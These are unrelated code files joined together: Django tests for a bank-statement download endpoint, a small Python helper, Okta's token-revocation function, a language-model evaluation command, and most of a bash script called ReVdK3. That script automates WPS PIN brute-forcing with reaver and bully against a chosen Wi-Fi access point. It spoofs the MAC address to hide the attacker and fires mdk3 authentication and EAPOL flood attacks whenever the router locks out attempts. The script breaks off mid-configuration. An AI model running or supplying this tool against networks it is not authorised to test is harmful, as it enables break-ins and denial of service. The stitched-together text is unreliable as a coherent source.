HTTP_AUTHORIZATION=self.get_http_authorization_for_user(user)
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(
response.json(),
{'missing_dates': ['2018-02-07', '2018-02-09']}
)
def test_empty_response_for_all_present(self):
user = self.bank_admins[0]
self._create_existing_file_downloads()
params = {
'label': BANK_STATEMENT_LABEL,
'date': ['2018-02-05', '2018-02-06']
}
response = self.client.get(
reverse('filedownload-missing'), params, format='json',
HTTP_AUTHORIZATION=self.get_http_authorization_for_user(user)
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(
response.json(),
{'missing_dates': []}
)
def test_error_for_invalid_date(self):
user = self.bank_admins[0]
self._create_existing_file_downloads()
params = {
'label': BANK_STATEMENT_LABEL,
'date': ['2018-02-05', '201-02-06']
}
response = self.client.get(
reverse('filedownload-missing'), params, format='json',
HTTP_AUTHORIZATION=self.get_http_authorization_for_user(user)
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_error_for_missing_label(self):
user = self.bank_admins[0]
self._create_existing_file_downloads()
params = {
'date': ['2018-02-05', '2018-02-06']
}
response = self.client.get(
reverse('filedownload-missing'), params, format='json',
HTTP_AUTHORIZATION=self.get_http_authorization_for_user(user)
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_error_for_missing_dates(self):
user = self.bank_admins[0]
self._create_existing_file_downloads()
params = {
'label': BANK_STATEMENT_LABEL
}
response = self.client.get(
reverse('filedownload-missing'), params, format='json',
HTTP_AUTHORIZATION=self.get_http_authorization_for_user(user)
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_cuts_off_at_earliest_record(self):
user = self.bank_admins[0]
self._create_existing_file_downloads()
params = {
'label': BANK_STATEMENT_LABEL,
'date': [
'2018-02-03', '2018-02-04', '2018-02-05', '2018-02-06',
'2018-02-07', '2018-02-08', '2018-02-09'
]
}
response = self.client.get(
reverse('filedownload-missing'), params, format='json',
HTTP_AUTHORIZATION=self.get_http_authorization_for_user(user)
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(
response.json(),
{'missing_dates': ['2018-02-07', '2018-02-09']}
)
def test_returns_empty_if_no_records_with_label_exist(self):
user = self.bank_admins[0]
params = {
'label': BANK_STATEMENT_LABEL,
'date': [
'2018-02-03', '2018-02-04', '2018-02-05', '2018-02-06',
'2018-02-07', '2018-02-08', '2018-02-09'
]
}
response = self.client.get(
reverse('filedownload-missing'), params, format='json',
HTTP_AUTHORIZATION=self.get_http_authorization_for_user(user)
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(
response.json(),
{'missing_dates': []}
)
|
def calculate_sum_of_multiples(variables, multiple):
sum_of_multiples = 0
for var_name, value in variables.items():
if int(var_name[3:]) % multiple == 0: # Extract the number from the variable name and check if it's a multiple
sum_of_multiples += value
return sum_of_multiples |
/*!
* Copyright (c) 2015-present, Okta, Inc. and/or its affiliates. All rights reserved.
* The Okta software accompanied by this notice is provided pursuant to the Apache License, Version 2.0 (the "License.")
*
* You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0.
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
*
* See the License for the specific language governing permissions and limitations under the License.
*
*/
/* eslint complexity:[0,8] */
import http from '../http';
import { toQueryString } from '../util';
import {
getOAuthUrls,
} from './util/oauth';
import { btoa } from '../crypto';
import AuthSdkError from '../errors/AuthSdkError';
import {
OktaAuth,
RevocableToken,
AccessToken,
RefreshToken
} from '../types';
// refresh tokens have precedence to be revoked if no token is specified
export function revokeToken(sdk: OktaAuth, token: RevocableToken): Promise<any> {
return Promise.resolve()
.then(function () {
var accessToken: string;
var refreshToken: string;
if (token) {
accessToken = (token as AccessToken).accessToken;
refreshToken = (token as RefreshToken).refreshToken;
}
if(!accessToken && !refreshToken) {
throw new AuthSdkError('A valid access or refresh token object is required');
}
var clientId = sdk.options.clientId;
var clientSecret = sdk.options.clientSecret;
if (!clientId) {
throw new AuthSdkError('A clientId must be specified in the OktaAuth constructor to revoke a token');
}
var revokeUrl = getOAuthUrls(sdk).revokeUrl;
var args = toQueryString({
// eslint-disable-next-line camelcase
token_type_hint: refreshToken ? 'refresh_token' : 'access_token',
token: refreshToken || accessToken,
}).slice(1);
var creds = clientSecret ? btoa(`${clientId}:${clientSecret}`) : btoa(clientId);
return http.post(sdk, revokeUrl, args, {
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
'Authorization': 'Basic ' + creds
}
});
});
} |
python transformers/examples/language-modeling/run_language_modeling.py --model_name_or_path train-outputs/512+512+512-N-VB/model --tokenizer_name model-configs/1536-config --eval_data_file ../data/wikitext-103-raw/wiki.valid.raw --output_dir eval-outputs/512+512+512-N-VB/512+512+512-shuffled-N-256 --do_eval --per_device_eval_batch_size 1 --dataloader_drop_last --augmented --augmentation_function shuffle_remove_all_but_nouns_first_third_sixth --eval_function last_sixth_eval |
#!/bin/bash
declare MAC;
declare PIN_TIME;
declare WLAN;
declare MON1;
declare MON2;
declare MON3;
declare PHY_OF_WLAN_1;
declare NO_OF_MONITOR_INTERFACES_CHECK;
declare MONITOR_INTERFACES;
declare STOP_INTERFACE;
declare VARIABLE;
declare CHANNEL;
declare DISTANCE_BETWEEN_PINS;
declare TIMEOUT;
declare ESSID;
declare SATISFIED_OPTION=r;
declare REAVER_COMMAND_LINE;
declare MDK3_MAIN_MENU_OPTION;
declare RETURN_OPTION_FOR_AUTH_DOS_FOR_AUTH_DOS;
declare RETURN_OPTION_FOR_EAPOL_START_FLOOD;
declare EAPOL_START_FLOOD_COMMAND;
declare AUTH_DOS_FLOOD_COMMAND;
declare RETURN_OPTION_FOR_EAPOL_LOG_OFF_FLOOD;
declare EAPOL_LOG_OFF_FLOOD_COMMAND;
declare VARIABLE_CHECK_FOR_RATE_LIMITING;
declare TARGET_STATION;
declare MDK3_KILLALL_1
declare AIREPLAY_KILLALL;
declare SUCCESSIVE_EAPOL_FAILURES;
declare AIREPLAY_RESET;
declare MONITOR_INTERFACES_CHECK;
declare GO_STATUS;
declare NO_GO_STATUS
clear
GO_STATUS=`echo -e "\e[31m[\e[34mAffirmative\e[31m]\e[0m"`
NO_GO_STATUS=`echo -e "\e[31m[\e[33mNegative\e[31m]\e[0m"`
REAVER_CHECK=`which reaver`
BULLY_CHECK=`which bully`
MDK3_CHECK=`which mdk3`
AIREPLAY_NG_CHECK=`which aireplay-ng`
GNOME_TERMINAL_CHECK=`which gnome-terminal`
TIMEOUT_CHECK=`which timeout`
echo -e "\e[36mChecking to see if the following programs are installed";
echo -e "\e[36mProgram Exist?"
echo -ne "\e[36m[1] reaver";
if [ -z "$REAVER_CHECK" ]; then
echo -e " $NO_GO_STATUS";
else
echo -e " $GO_STATUS";
fi
sleep 0.2
echo -ne "\e[36m[2] bully";
if [ -z "$BULLY_CHECK" ]; then
echo -e " $NO_GO_STATUS";
else
echo -e " $GO_STATUS";
fi
sleep 0.2
echo -ne "\e[36m[3] mdk3";
if [ -z "$MDK3_CHECK" ]; then
echo -e " $NO_GO_STATUS";
else
echo -e " $GO_STATUS";
fi
sleep 0.2
echo -ne "\e[36m[4] aireplay-ng";
if [ -z "$AIREPLAY_NG_CHECK" ]; then
echo -e " $NO_GO_STATUS";
else
echo -e " $GO_STATUS";
fi
sleep 0.2
echo -ne "\e[36m[5] gnome-terminal";
if [ -z "$GNOME_TERMINAL_CHECK" ]; then
echo -e " $NO_GO_STATUS";
else
echo -e " $GO_STATUS";
fi
sleep 0.2
echo -ne "\e[36m[5] timeout";
if [ -z "$TIMEOUT_CHECK" ]; then
echo -e " $NO_GO_STATUS";
else
echo -e " $GO_STATUS";
fi
sleep 0.2
if [ -z "$MDK3_CHECK" ]; then
echo -e "\e[31m\e[1mmdk3 is not installed.Exiting script...";
exit
fi
if [ -z "$AIREPLAY_NG_CHECK" ]; then
echo -e "\e[31m\e[1maireplay-ng is not installed.Exiting script...";
exit
fi
if [ -z "$GNOME_TERMINAL_CHECK" ]; then
echo -e "\e[31m\e[1mgnome-terminal is not installed.Exiting script...";
exit
fi
if [ -z "$TIMEOUT_CHECK" ]; then
echo -e "\e[31m\e[1mtimeout is not installed.Exiting script...";
exit
fi
clear
#WELCOM MESSAGE
echo -e "\e[36m\e[1m###########################\e[0m";
echo -e "\e[36m\e[1m# WELCOME TO ReVdK3 Script# \e[35m\e[1mC\e[92m\e[1mR\e[91m\e[1mE\e[34m\e[1mA\e[33m\e[1mT\e[96m\e[1mE\e[35m\e[1mD \e[92m\e[1mB\e[35m\e[1mY\e[0m : \e[35m\e[1mR\e[92m\e[1mE\e[91m\e[1mP\e[34m\e[1mZ\e[33m\e[1mE\e[96m\e[1mR\e[35m\e[1mO\e[92m\e[1mW\e[91m\e[1mO\e[34m\e[1mR\e[33m\e[1mL\e[96m\e[1mD\e[35m\e[1m\e[0m";
echo -e "\e[36m\e[1m###########################\e[0m";
echo -e "\e[36m\e[1m#####################################################################\e[0m";
echo -e "\e[36m\e[1m# This Script allows you to use reaver and an mdk3 flood attack that#\e[0m";
echo -e "\e[36m\e[1m# you choose #\e[0m";
echo -e "\e[36m\e[1m#####################################################################\e[0m";
echo -e "\e[36m\e[1m# This Script was created for Access Points that locks up for long #\e[0m";
echo -e "\e[36m\e[1m# periods of time. It works by starting reaver and continously #\e[0m";
echo -e "\e[36m\e[1m# detect when reaver is rate limiting pins, once reaver detects #\e[0m";
echo -e "\e[36m\e[1m# the AP is rate limiting pins, it starts mdk3 attacks. mdk3 attacks#\e[0m";
echo -e "\e[36m\e[1m# are killed once reaver detects that the AP has unlocked itself ! #\e[0m";
echo -e "\e[36m\e[1m# The prcoess goes on... #\e[0m";
echo -e "\e[36m\e[1m#####################################################################\e[0m";
echo ;
echo -e "\e[37m\e[44m\e[1m ReVdK3.sh-r2 (Revision 2)\e[0m";
echo ;
echo -e "\e[37m\e[44m\e[1mWHAT'S NEW?:Incorporating bully into the script\e[0m";
echo ;
echo -e "\e[37m\e[44m\e[1mThanks to N1ksan for some useful ideas!\e[0m";
echo ;
echo -e "\e[36m\e[40m\e[1m******************************************************\e[0m";
echo -e "\e[36m\e[40m\e[1m* Welcome: I need to verify your wireless interface *\e[0m";
echo -e "\e[36m\e[40m\e[1m******************************************************\e[0m";
echo ;
read -p "Which wireless interface you will be using? e.g wlan1, wlan2 etc": WLAN;
EXISTENCE_OF_WLAN=`airmon-ng|grep ''"$WLAN"|cut -f1`;
while [ -z "$WLAN" -o "$EXISTENCE_OF_WLAN" != "$WLAN" ]; do
echo -e "\e[31m\e[1mYou input a wireless interface that doesn't exist!\e[0m";
echo ;
read -p "Which wireless interface you will be using? e.g wlan1, wlan2 etc": WLAN;
EXISTENCE_OF_WLAN=`airmon-ng|grep ''"$WLAN"|cut -f1`;
done
PHY_OF_WLAN_1=`airmon-ng|grep $WLAN|cut -d ' ' -f4`;
NO_OF_MONITOR_INTERFACES_CHECK=`airmon-ng|grep -F "$PHY_OF_WLAN_1"|wc -l`;
MONITOR_INTERFACES=`airmon-ng|grep -F "$PHY_OF_WLAN_1"|cut -f1|tr -s [:space:] ' '`;
echo -e "\e[36m\e[1mKilling any existing monitor interface(s) on $WLAN\e[0m";
if [ "$NO_OF_MONITOR_INTERFACES_CHECK" != 1 ]; then
for STOP_INTERFACE in $MONITOR_INTERFACES; do
if [ "$STOP_INTERFACE" != "$WLAN" ]; then
airmon-ng stop $STOP_INTERFACE > /dev/null;
fi
done
fi
echo -e "\e[36m\e[1mSuccessful!\e[0m";
echo -e "\e[36m\e[1mStarting three new monitor modes...\e[0m";
MON1=`airmon-ng start $WLAN|grep -F '(monitor mode enabled on '|tr -s [:space:] ' '|cut -d ' ' -f6|tr -d ')'`
MON2=`airmon-ng start $WLAN|grep -F '(monitor mode enabled on '|tr -s [:space:] ' '|cut -d ' ' -f6|tr -d ')'`
MON3=`airmon-ng start $WLAN|grep -F '(monitor mode enabled on '|tr -s [:space:] ' '|cut -d ' ' -f6|tr -d ')'`
echo "Successful!"
trap 'echo -e "\n\e[36m\e[1mCleaning up all temporary files created by this script..good house keeping...ensuring all processes are killed!\e[31m\e[0m";
killall -1 ReVdK3-r2.sh;killall mdk3 2> /dev/null; killall -9 reaver 2> /dev/null;killall -9 bully 2> /dev/null; killall tail 2> /dev/null; rm -f /etc/reaver_tmp.txt 2> /dev/null;
rm -f /etc/bully_tmp.txt 2> /dev/null; airmon-ng stop "$MON1" > /dev/null; airmon-ng stop "$MON2" > /dev/null; airmon-ng stop "$MON3" > /dev/null;
killall aireplay-ng 2> /dev/null;rm -f /etc/aireplay_tmp.txt 2> /dev/null;killall -9 ReVdK3-r2.sh > /dev/null;' SIGINT SIGHUP EXIT
clear
function REAVER_COMMAND_LINE_OPTIONS {
while [ "$SATISFIED_OPTION" = r ]; do
clear
echo ;
echo -e "\e[36m\e[40m\e[1m***********************************\e[0m";
echo -e "\e[36m\e[40m\e[1m*Welcome to Reaver's configuration*\e[0m";
echo -e "\e[36m\e[40m\e[1m***********************************\e[0m";
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx MAC ADDRESS OF AP x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "What is the mac address of the access point you are targeting?": MAC;
while [ -z "$MAC" ]; do
echo -e "\e[31m\e[1mYou need to input the target's MAC address\e[0m";
echo ;
read -p "What is the mac address of the access point you are targeting?": MAC;
done
echo "MAC address saved...";
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx ESSID OF AP x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "What is the essid of the access point you are targeting": ESSID;
while [ -z "$ESSID" ]; do
echo -e "\e[31m\e[1mYou need to input the target's ESSID when running aireplay-ng &/or running mdk3 eapol start flood attacks!\e[0m";
echo ;
read -p "What is the essid of the access point you are targeting": ESSID;
done
echo "ESSID saved...";
echo -e "\e[36m\e[1mI am hiding your identity by changing your mac\e[0m";
sleep 2;
ifconfig $WLAN down;
ifconfig $WLAN down;
ifconfig $WLAN down;
ifconfig $MON1 down;
ifconfig $MON1 down;
ifconfig $MON2 down;
ifconfig $MON2 down;
ifconfig $MON3 down;
ifconfig $MON3 down;
macchanger -m '78:03:40:02:94:8f' "$WLAN"> /dev/null;
macchanger -m '78:03:40:02:94:8f' "$MON1"> /dev/null;
macchanger -m '78:03:40:02:94:8f' "$MON2"> /dev/null;
macchanger -m '78:03:40:02:94:8f' "$MON3"> /dev/null;
ifconfig $MON1 up;
ifconfig $MON1 up;
ifconfig $MON2 up;
ifconfig $MON2 up;
ifconfig $MON3 up;
ifconfig $MON3 up;
echo;
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx Reaver's Options x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx x\e[0m";
echo -e "\e[36m\e[40m\e[1mx[1] Channel Option (-c) x\e[0m";
echo -e "\e[36m\e[40m\e[1mx(note: Some Access Point hop to another channel when they reboot! x\e[0m";
echo -e "\e[36m\e[40m\e[1mx............................................................................x\e[0m";
echo -e "\e[36m\e[40m\e[1mx[2] Timeout Option (-t) x\e[0m";
echo -e "\e[36m\e[40m\e[1mx(Reaver's time to wait for a message from the AP) x\e[0m";
echo -e "\e[36m\e[40m\e[1mx............................................................................x\e[0m";
echo -e "\e[36m\e[40m\e[1mx[3] Reaver's time between pin (-d) x\e[0m";
echo -e "\e[36m\e[40m\e[1mx x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
#CHANNEL CHAIN
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx CHANNEL SWITCH x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "What channel you want reaver listen on (-c flag), or press ENTER to use default reaver's option": CHANNEL;
while [[ "$CHANNEL" != @(1|2|3|4|5|6|7|8|9|10|11|12|13|14|15|16|) ]]; do
echo -e "\e[31m\e[1mYou need to input a channel number between 1-16\e[0m";
echo ;
read -p "What channel you want reaver listen on (-c flag), or press ENTER to use default reaver's option": CHANNEL;
done
#DISTANCE BETWEEN PIN ATTEMPTS CHAIN
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx PIN DELAY SWITCH x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "How much time in seconds for distance between pin attempts? (-d flag), if you want to use default option press ENTER ": DISTANCE_BETWEEN_PINS
while [[ $DISTANCE_BETWEEN_PINS = ["-"A-Za-qs-z'`''~''@''#''$''%''^''&''*''('')''_''+''=''|''['']''{''}''\'"'"'"'';'':'',''.''<''>''/''?'' *''0']* ]]; do
echo -e "\e[31m\e[1mYou need to choose a postive number!\e[0m";
echo ;
read -p "How much time in seconds for distance between pin attempts? (-d flag), if you want to use default option press ENTER ": DISTANCE_BETWEEN_PINS
done
#TIME OUT CHAIN
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx TIMEOUT SWITCH x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "How much time in seconds for reaver to timeout if the AP doesn't respond? (-t flag), if you want to use default option press ENTER": TIMEOUT;
while [[ $TIMEOUT = ["-"A-Za-qs-z'`''~''@''#''$''%''^''&''*''('')''_''+''=''|''['']''{''}''\'"'"'"'';'':'',''.''<''>''/''?'' *''0']* ]]; do
echo -e "\e[31m\e[1mYou need to choose a postive number!\e[0m";
echo ;
read -p "How much time in seconds for reaver to timeout if the AP doesn't respond? (-t flag), if you want to use default
option press ENTER": TIMEOUT;
echo ;
done
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx REAVER COMMAND LINE YOU HAVE CHOOSEN x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
if [ -z "$CHANNEL" -a -n "$DISTANCE_BETWEEN_PINS" -a "$TIMEOUT" ]; then
echo "reaver -i $MON1 -b $MAC -S -d $DISTANCE_BETWEEN_PINS -t $TIMEOUT -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -d $DISTANCE_BETWEEN_PINS -t $TIMEOUT -l 10 -N -vv"`;
echo ;
fi
if [ -z "$DISTANCE_BETWEEN_PINS" -a -n "$CHANNEL" -a -n "$TIMEOUT" ]; then
echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -t $TIMEOUT -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -t $TIMEOUT -l 10 -N -vv"`;
echo;
fi
if [ -z "$TIMEOUT" -a -n "$DISTANCE_BETWEEN_PINS" -a -n "$CHANNEL" ]; then
echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -d $DISTANCE_BETWEEN_PINS -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -d $DISTANCE_BETWEEN_PINS -l 10 -N -vv"`;
echo ;
fi
if [ -z "$CHANNEL" -a -z "$DISTANCE_BETWEEN_PINS" -a -n "$TIMEOUT" ]; then
echo "reaver -i $MON1 -b $MAC -S -t $TIMEOUT -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -t "$TIMEOUT" -l 10 -N -vv"`;
echo ;
fi
if [ -z "$CHANNEL" -a -z "$TIMEOUT" -a -n "$DISTANCE_BETWEEN_PINS" ]; then
echo "reaver -i $MON1 -b $MAC -S -d $DISTANCE_BETWEEN_PINS -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -d $DISTANCE_BETWEEN_PINS -l 10 -N -vv"`;
echo ;
fi
if [ -z "$DISTANCE_BETWEEN_PINS" -a -z "$TIMEOUT" -a -n "$CHANNEL" ]; then
echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -l 10 -N -vv"`;
echo ;
fi
if [ -z "$DISTANCE_BETWEEN_PINS" -a -z "$TIMEOUT" -a -z "$CHANNEL" ]; then
echo "reaver -i $MON1 -b $MAC -S -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -l 10 -N -vv"`;
fi
if [ -n "$DISTANCE_BETWEEN_PINS" -a -n "$TIMEOUT" -a -n "$CHANNEL" ]; then
echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -d $DISTANCE_BETWEEN_PINS -t $TIMEOUT -l 10 -N -vv";
REAVER_COMMAND_LINE=`echo "reaver -i $MON1 -b $MAC -S -c $CHANNEL -d $DISTANCE_BETWEEN_PINS -t $TIMEOUT -l 10 -N -vv"`;
echo ;
fi
echo ;
read -p "Are you satisified with this configuration? if not, input 'r' and you will be returned to Reaver's Configuration Wizard": SATISFIED_OPTION;
if [ -e /etc/reaver_tmp.txt ]; then
rm -f /etc/reaver_tmp.txt
fi
if [ -e /etc/aireplay_tmp.txt ]; then
rm -f /etc/aireplay_tmp.txt
fi
clear
done
}
function BULLY_COMMAND_LINE_OPTIONS {
while [ "$SATISFIED_OPTION" = r ]; do
clear
echo ;
echo -e "\e[36m\e[40m\e[1m***********************************\e[0m";
echo -e "\e[36m\e[40m\e[1m*Welcome to Bully's configuration *\e[0m";
echo -e "\e[36m\e[40m\e[1m***********************************\e[0m";
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx MAC ADDRESS OF AP x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "What is the mac address of the access point you are targeting?": MAC;
while [ -z "$MAC" ]; do
echo -e "\e[31m\e[1mYou need to input the target's MAC address\e[0m";
echo ;
read -p "What is the mac address of the access point you are targeting?": MAC;
done
echo "MAC address saved...";
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx ESSID OF AP x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "What is the essid of the access point you are targeting": ESSID;
while [ -z "$ESSID" ]; do
echo -e "\e[31m\e[1mYou need to input the target's ESSID when running aireplay-ng &/or running mdk3 eapol start flood attacks!\e[0m";
echo ;
read -p "What is the essid of the access point you are targeting": ESSID;
done
echo "ESSID saved...";
echo -e "\e[36m\e[1mResetting your mac address to its original mac\e[0m";
sleep 2;
ifconfig $WLAN down;
ifconfig $WLAN down;
ifconfig $WLAN down;
ifconfig $MON1 down;
ifconfig $MON1 down;
ifconfig $MON2 down;
ifconfig $MON2 down;
ifconfig $MON3 down;
ifconfig $MON3 down;
macchanger -p "$WLAN"> /dev/null;
macchanger -p "$MON1"> /dev/null;
macchanger -p "$MON2"> /dev/null;
macchanger -p "$MON3"> /dev/null;
ifconfig $MON1 up;
ifconfig $MON1 up;
ifconfig $MON2 up;
ifconfig $MON2 up;
ifconfig $MON3 up;
ifconfig $MON3 up;
echo;
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx Bully's Options x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx x\e[0m";
echo -e "\e[36m\e[40m\e[1mx[1] Channel Option (-c) x\e[0m";
echo -e "\e[36m\e[40m\e[1mx(note: Some Access Point hop to another channel when they reboot! x\e[0m";
echo -e "\e[36m\e[40m\e[1mx............................................................................x\e[0m";
echo -e "\e[36m\e[40m\e[1mx[2] Bully's time between pin (-1) x\e[0m";
echo -e "\e[36m\e[40m\e[1mx x\e[0m";
echo -e "\e[36m\e[40m\e[1mx............................................................................x\e[0m";
echo -e "\e[36m\e[40m\e[1mx[3] Force Bruteforce Checksum Digit (-B -F) x\e[0m";
echo -e "\e[36m\e[40m\e[1mx x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
echo -e "\e[34m\e[7m\e[1mNote:\e[31m\e[0m\e[31m\e[1m
Timeout option (-t) is Deprecated / Ignored in bully.\e[30m\e[0m"
echo ;
#CHANNEL CHAIN
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx CHANNEL SWITCH x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "What channel you want reaver listen on (-c flag), or press ENTER to use default bully's option": CHANNEL;
while [[ "$CHANNEL" != @(1|2|3|4|5|6|7|8|9|10|11|12|13|14|15|16|) ]]; do
echo -e "\e[31m\e[1mYou need to input a channel number between 1-16\e[0m";
echo ;
read -p "What channel you want reaver listen on (-c flag), or press ENTER to use default bully's option": CHANNEL;
done
#DISTANCE BETWEEN PIN ATTEMPTS CHAIN
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx FIRST HALF OF PIN DELAY SWITCH x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "How much time in seconds for distance between pin attempts? (-1 flag), if you want to use default option press ENTER ": DISTANCE_BETWEEN_PINS
while [[ $DISTANCE_BETWEEN_PINS = ["-"A-Za-qs-z'`''~''@''#''$''%''^''&''*''('')''_''+''=''|''['']''{''}''\'"'"'"'';'':'',''.''<''>''/''?'' *''0']* ]]; do
echo -e "\e[31m\e[1mYou need to choose a postive number!\e[0m";
echo ;
read -p "How much time in seconds for distance between pin attempts? (-1 flag), if you want to use default option press ENTER ": DISTANCE_BETWEEN_PINS
done
echo ;
#BRUTEFORCE CHECKSUM
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo -e "\e[36m\e[40m\e[1mx BRUTEFORCE CHECKSUM DIGIT SWITCH x\e[0m";
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
echo ;
read -p "Would you prefer bully to bruteforce the checksum digit if the first half of the pin is found?Press ENTER for 'no' or input 'y' or 'Y' for 'yes'": BRUTEFORCE_CHECKSUM;
while [[ $BRUTEFORCE_CHECKSUM != @(y|Y|) ]]; do
echo -e "\e[31m\e[1mYou need to input 'y'or 'Y' for 'yes' OR or press ENTER for 'no' !\e[0m";
echo ;
read -p "Would you prefer bully to bruteforce the checksum digit if the first half of the pin is found?Press ENTER for 'no' or input 'y' or 'Y' for 'yes'": BRUTEFORCE_CHECKSUM;
echo;
done
echo ;
echo -e "\e[36m\e[40m\e[1mxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\e[0m";
